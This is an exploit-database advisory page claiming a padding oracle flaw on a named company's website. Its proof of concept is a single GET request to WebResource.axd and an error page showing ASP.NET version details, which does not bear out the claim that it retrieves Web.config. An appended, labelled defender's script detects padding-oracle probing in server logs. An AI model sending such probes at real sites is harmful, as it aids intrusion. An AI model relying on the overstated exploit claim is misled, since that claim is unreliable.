istikbal Padding Oracle Vulnerability - CXSecurity.com

Vulnerability ID: 1856566  Vulnerability type: (not given)
Published: 2019-12-11  Updated: 2019-12-11
CVE ID: N/A  CNNVD-ID: N/A
Platform: N/A  CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2019120052
|Details
Vulnerability details have not yet been disclosed.
|Exploit
# Exploit Title: istikbal Padding Oracle Vulnerability
# Date: 10.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: istikbal.com.tr
# Version: ALL
# Tested on: Windows 10 - Linux Kali


***************************************************************************************************
This proof-of-concept exploit performs a Padding Oracle attack against a simple ASP.NET application (it can be any application) to download a file from the remote Web Server. In this example the proof-of-concept exploit downloads the Web.config file.

GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=rsdw2kouuyhy2odwcpy1vi35
Host: www.istikbal.com.tr
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

PoC response:

<!DOCTYPE html>
<html>
    <head>
        <title>The resource cannot be found.</title>

           ****** <b> Requested URL: </b>/WebResource.axd<br><br>*********

            <hr width=100% size=1 color=silver>

            <b>Version Information:</b> Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3062.0

            </font>
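As an added defender's example (not part of the original advisory or the author's PoC), the following Python flags the request pattern a padding-oracle probe leaves in web-server logs: one client cycling through many distinct `d=` values against `WebResource.axd`/`ScriptResource.axd` and collecting server errors, which is the signature a detection rule can key on. The log layout, IP addresses, `d` values and thresholds are constructed for illustration and are assumptions, not values from this page.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Handlers whose encrypted "d" parameter the ASP.NET padding oracle abused.
ORACLE_HANDLERS = ("/webresource.axd", "/scriptresource.axd")

# Constructed sample lines in a simplified W3C layout (assumption, not real logs):
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2019-12-10 10:00:01 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAAAQ2 500
2019-12-10 10:00:01 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAAAg2 500
2019-12-10 10:00:02 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAAAw2 500
2019-12-10 10:00:02 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAABA2 500
2019-12-10 10:00:03 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAABQ2 200
2019-12-10 10:00:03 203.0.113.7 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAABg2 500
2019-12-10 10:00:05 198.51.100.4 GET /WebResource.axd d=k7QdGgUAAAAAAAAAAAAAAA2 200
2019-12-10 10:00:06 198.51.100.4 GET /Default.aspx - 200
2019-12-10 10:00:07 198.51.100.4 GET /ScriptResource.axd d=k7QdGgUAAAAAAAAAAAAAAA2 200
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def summarize(log_text):
    """Per client IP: distinct d= values sent to oracle handlers and how many errored."""
    stats = defaultdict(lambda: {"distinct_d": set(), "errors": 0, "total": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["stem"].lower() not in ORACLE_HANDLERS:
            continue  # only the .axd handlers carry the encrypted d parameter
        entry = stats[m["ip"]]
        entry["total"] += 1
        entry["distinct_d"].update(parse_qs(m["query"]).get("d", []))
        if m["status"].startswith("5"):
            entry["errors"] += 1
    return stats


def flag_probers(log_text, min_distinct=5, min_error_ratio=0.5):
    """IPs that cycled many d values and mostly got server errors: oracle-probing signature."""
    flagged = []
    for ip, s in summarize(log_text).items():
        if len(s["distinct_d"]) >= min_distinct and s["errors"] / s["total"] >= min_error_ratio:
            flagged.append(ip)
    return sorted(flagged)
```

A legitimate client reuses the same handful of `d` values the page markup gave it, so the distinct-value count stays low even on a busy site; tune the thresholds to the application's real baseline before alerting on them.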